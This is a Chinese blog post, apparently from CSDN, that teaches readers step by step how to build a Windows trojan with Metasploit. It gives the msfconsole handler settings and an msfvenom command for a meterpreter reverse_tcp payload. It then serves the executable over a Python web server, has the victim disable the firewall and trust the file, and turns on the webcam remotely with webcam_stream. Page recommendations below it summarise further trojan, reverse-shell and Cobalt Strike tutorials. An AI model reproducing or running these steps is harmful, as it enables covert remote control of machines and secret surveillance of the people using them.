教大家用虚拟机实现一个小的木马

最新推荐文章于 2024-10-17 11:18:41 发布
最新推荐文章于 2024-10-17 11:18:41 发布
阅读量1k 收藏 10
点赞数 31
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83344288/article/details/137543455
版权

今天来教大家玩一个小游戏,用一个木马来实现本机的监听

首先,打开你的VMware Workstation Pro

其次打开你的虚拟机这里我用的是kali

接下来就要正式开始咯

一、配置监听(打开终端,这里代号终端1,以便后文区分)
1.打开msf:msfconsole

2.set payload

3.set payload windows

4.ip a

框内的为你自己的IP

二、使用监听模块:use exploit/multi/handler

三、配置监听载荷:set payload windows/x64/meterpreter/reverse_tcp
四、配置监听IP与端口

这里的ip地址就是我上述步骤中红框所标出的本机ip

端口号可以自拟,这里以1111为例

五、开始监听 run
六、制作木马

这里需要重新打开一个终端,这里代号终端2,接着输入
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=(自己的IP) lport=(可自定义的)-f exe -o tt.exe(.exe文件可自定义命名)

接下来继续输入:python3 -m http.server 80

七、复制木马

如果安装了win7虚拟机就可以打开win7虚拟机里的百度,我没有安装这里以本机为例:(记得先关闭防火墙)

复制自己的IP输入在此:

接着你会看到一下页面:

找到你前边自定义命名的.exe文件,这里我命名的是tt.exe,打开

如果弹出一下情况时:

选择信任此文件即可解决,接着打开文件

随后在终端1中输入:

webcam_list
webcam_stream 

稍加等候即可打开本机摄像头实现监听

以上教学就结束啦,感兴趣的朋友们可以动手试一试呢!

初涉代码
关注
Cobalt Strike入门程-通过exe木马实现远控
weixin_30770495的博客
05-18 5152
Cobalt Strike(简称CS)有很多功能,这篇文章主要介绍最基本的功能:通过exe木马实现远程控制。 CS分为两部分:客户端和Team Server服务端。这两部分都依赖Java 1.8,所以运行CS程序前要安装JRE。 分享一个Cobalt Strike v3.8的试用版,可长期试用。百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4Hs...
android木马的制作方法,实现木马病毒的详细步骤
weixin_28292761的博客
05-27 1万+
前言:有没有遇到过这种情况,打开邮件,发现一封非常正常的邮件,附带了连接,你不以为然的点进去,结果中木马病毒了,这个套路是不是很熟悉,也很老套,但稍不注意就容易中木马病毒,希拉里邮件门事件不就是这样么?!作为一名程序员,你是否想过怎样实现这样一个木马病毒呢?来吧,这个项目就带你学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理,带你一步步了解如何制作一...
VMware win10虚拟机一个简单的木马实验
m0_51478477的博客
06-14 1016
基于python实现一个简单的木马实验:在客户端中读取服务端的文件,在VMware中跑通。
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1495
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9908
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
冰河木马使用(纯属学习)
热门推荐
Prodigal
11-26 4万+
冰河木马准备工作第一步第二步 冰河木马以及灰鸽子木马都可以实现远程控制。 一下举例冰河木马软件使用 准备工作 要向看到现象 必须用虚拟机,因为外面系统,我的是win10,即使关闭防火墙,关闭360,也会被自动删除冰河木马,因为这种木马很老,已经被列入检测的范围内,所以一般都会被干掉。 1、虚拟机中安装,两个win7 32位系统,或者一个32位一个64位,32位梓潼作为攻击目标靶机,另一个作为攻击者...
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接
Zeker62的博客
08-06 3113
实验环境建议在虚拟机上运行 科学无罪,所有实验环境都在局域网内进行 实验条件 两个Windows虚拟机 一个安装大白鲨远程控制软件 两个虚拟机开启ftp服务(用于木马文件之间的传输) 大白鲨远程控制软件是一个比较旧的攻击软件 大白鲨远程控制 2010 Bate1(v1.6) 运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008 软件简介: 兼容1.4~1.3版本 单一exe,不带DLL文件(无可没配置前114KB,压缩52KB)! 注入进程兼容win7/win8
vmware虚拟机的基础使用
dhdichch的博客
06-02 3520
vmware虚拟化软件的基础使用
虚拟机Linux文件共享.pdf
10-07
2. 使用VMware可以轻松实现多系统同时运行,特别对于一些喜欢测试软件、病毒及木马的朋友来说,VMware绝对是一款不可多得的软件。 虚拟机Linux文件共享可以通过安装VMware Tools、配置共享文件夹、在虚拟机中使用...
Metasploit 实现木马生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
05-08
Metasploit 是一个开源的安全漏洞测试框架,广泛用于渗透测试和安全研究。本程将深入探讨如何利用 Metasploit 来创建、捆绑木马以及实现免杀技术。通过源码分析和设计说明书,您可以自己运行并复现这些过程,从而...
ubuntu24 finalshell 无法连接ubuntu服务器, 客户端无法连接ubuntu, 无法远程连接ubuntu。
求是
10-11 418
场景: 虚拟机新创建一个最小化的ubuntu服务器,使用finalshell连接服务,发现连接不上。我的问题是安装了openssh server 但是没有配置root可以远程登录,修改即可。2. 查看是否安装openssh server, 并配置。1. 查看防火墙ufw 是否开启,22端口是否放行。# 如果没有vi, 安装命令为: 去除 #2. 安装openssh server。
服务器数据恢复—服务器宕机导致挂载的V7000存储文件系统损坏的数据恢复案例
beiya123的博客
10-14 227
经过对底层数据的分析,数据恢复工程师发现出现故障的原因是MFT表自身的文件记录的80属性DATARUNS在操作系统自检时被截断。服务器进入系统自动进行磁盘扫描修复时,管理员强制关机并断开了存储和服务器之间的连接,导致这台存储上的文件系统损坏,报错“文件或目录损坏且无法读取”。5、数据恢复工程师通过手工分析的方式尽量将数据恢复出来。恢复完成后分区可以正常打开,恢复出来的数据量和丢失的数据量基本一致,目录结构完整。6、经过用户方的仔细检测后,确认恢复出来的数据完整有效,认可数据恢复结果。
使用多IP香港站群服务器对网站管理seo优化提升排名有益处
wys2338的博客
10-14 651
2. 地理位置灵活性:通过多IP香港站群服务器,您可以选择将不同的网站部署在不同的IP地址上,包括不同的地理位置。站群服务器可以通过多IP管理不同的网站,每个网站都有独立的IP地址和域名。2. 灵活定位:可以根据不同的目标市场或地区,将不同的网站部署在不同的IP地址上,实现精准的地理定位和定向优化。4. 简化管理:每个网站都有独立的IP地址和域名,可以方便地管理和维护各个网站,提供更好的资源分配和管理效率。:通过将流量分散到不同的IP地址和服务器上,可以提高网站的性能和可靠性,降低延迟和故障的风险。
网络编程(18)——使用asio协程实现并发服务器
m0_63086198的博客
10-11 913
通过协程实现并发服务器可大大减少代码量,相比异步编程更加直观,但受限于平台,目前C++20的协程说是协程库,实际上只是开放了无栈协程的协议,正儿八经的官方协程还未发布。use_awaitable,使异步函数通过同步方式写出来,在一个函数中进行数据的粘包处理、网络序列-本地序列转换、序列化处理,并将消息投递至逻辑队列。,并在操作完成时恢复。信号处理,当遇到退出信号(ctrl+c或强制终止信号)时,执行lambd函数,停止ioc的运行。同理,异步写函数也以同步的方式使用,不需要显示bind回调函数,
Nginx(Linux):服务器版本升级和新增模块
MMF博客园
10-14 396
Nginx(Linux):服务器版本升级和新增模块
利用香港多IP服务器建站蜘蛛池执行SEO策略的实践
wys2338的博客
10-11 607
丰富的IPv4资源有利于SEO优化,机房基础设施遍布全球主要国家和地区,全球数据中心;独享IP地址,多个IP段自选,弹性拓展,能随时应对高峰负载或突发流量。支持BGP、CN2、电信、联通、移动等多种网络网络延迟最低(香港机房),可选双线或者多线网络,解决网络瓶颈问题,更方便蜘蛛爬行。近代英特尔至强E5-V2、V3、V4新一代至强CPU等,性能较强,可满足几十甚至几百个网站运行;系统定时检测IP的响应情况,对网络进行全方位的监控,能够及时检测到IP的异常信息,降低故障中断时间,防止网站被降权。
服务器缺少宋体安装
最新发布
tiantiantbtb的博客
10-17 184
window : C:\Windows\Fonts 下找到宋体常规 是simsun.ttc 将宋体常规 复制到服务器。cd /usr/share/fonts/chinese/ 不进入也可以刷新 看下simsun.ttc在不在。将宋体常规文件拖到服务器 然后复制到/usr/share/fonts/chinese/
【AI-20】训练服务器和推理服务器
qq_45611002的博客
10-11 658
(一)任务排队与优先级管理。(二)性能监控与优化。(三)便于管理和维护。
【Ubuntu登陆不上】Ubuntu服务器多次登录不上,显示Access Denied解决办法
weixin_42098685的博客
10-14 385
当超过了服务器一个账户密码尝试次数限制后,可能不管密码正确与否都无法登录。这时候可以使用另一个可以登录的账户,或者请其他可以登录的人帮忙解决。这样你就可以根据需要调整登录尝试次数限制,或者取消该限制。,即允许 5 次登录尝试,用户已经尝试了 10 次。值设置得过大,因为这可能会增加被暴力破解的风险。如果你想永久性地调整登录尝试次数限制,可以编辑。如果不希望使用登录失败次数限制,你可以移除。的值,表示允许的失败尝试次数。,从而取消登录尝试次数的限制。中,找到并删除或注释掉包含。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值